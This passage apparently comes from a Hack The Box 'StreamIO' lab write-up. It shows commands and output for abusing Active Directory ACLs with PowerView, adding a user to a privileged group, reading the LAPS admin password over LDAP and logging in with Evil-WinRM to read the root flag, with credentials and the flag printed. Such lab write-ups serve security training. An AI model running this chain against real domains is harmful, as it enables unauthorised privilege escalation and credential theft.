*Evil-WinRM* PS C:\Users\nikk37\Desktop> $pass = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37\Desktop> $cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $pass)
Add JDgodd to the group: Core Staff¶
*Evil-WinRM* PS C:\Users\nikk37\Desktop> Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
*Evil-WinRM* PS C:\Users\nikk37\Desktop> Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"
*Evil-WinRM* PS C:\Users\nikk37\Desktop> net user jdgodd
User name JDgodd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 2:56:42 AM
Password expires Never
Password changeable 2/23/2022 2:56:42 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/8/2024 1:08:14 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *CORE STAFF
The command completed successfully.
Query the LAPS password with ldapsearch¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ ldapsearch -x -H ldap://10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D "[email protected]" -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base <DC=streamIO,DC=htb> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd
#

# DC, Domain Controllers, streamIO.htb
dn: CN=DC,OU=Domain Controllers,DC=streamIO,DC=htb
ms-Mcs-AdmPwd: 077StPm(a%rF/1

# search reference
ref: ldap://ForestDnsZones.streamIO.htb/DC=ForestDnsZones,DC=streamIO,DC=htb

# search reference
ref: ldap://DomainDnsZones.streamIO.htb/DC=DomainDnsZones,DC=streamIO,DC=htb

# search reference
ref: ldap://streamIO.htb/CN=Configuration,DC=streamIO,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3
Login as administrator¶
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_StreamIO]
└─$ evil-winrm -u administrator -p '077StPm(a%rF/1' -i 10.10.11.158
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Read flag: root.txt¶
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/22/2022 2:48 AM .NET v4.5
d----- 2/22/2022 2:48 AM .NET v4.5 Classic
d----- 2/26/2022 10:20 AM Administrator
d----- 5/9/2022 5:38 PM Martin
d----- 2/26/2022 9:48 AM nikk37
d-r--- 2/22/2022 1:33 AM Public
*Evil-WinRM* PS C:\Users> cd Martin\Desktop
*Evil-WinRM* PS C:\Users\Martin\Desktop> dir
Directory: C:\Users\Martin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/8/2024 8:56 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Martin\Desktop> type root.txt
538ef1a8218fb291d8f019f4fb7d14b3
*Evil-WinRM* PS C:\Users\Martin\Desktop>
References¶
Firepwd.py, an open source tool to decrypt Mozilla protected passwords
Lessons Learned¶
Tags¶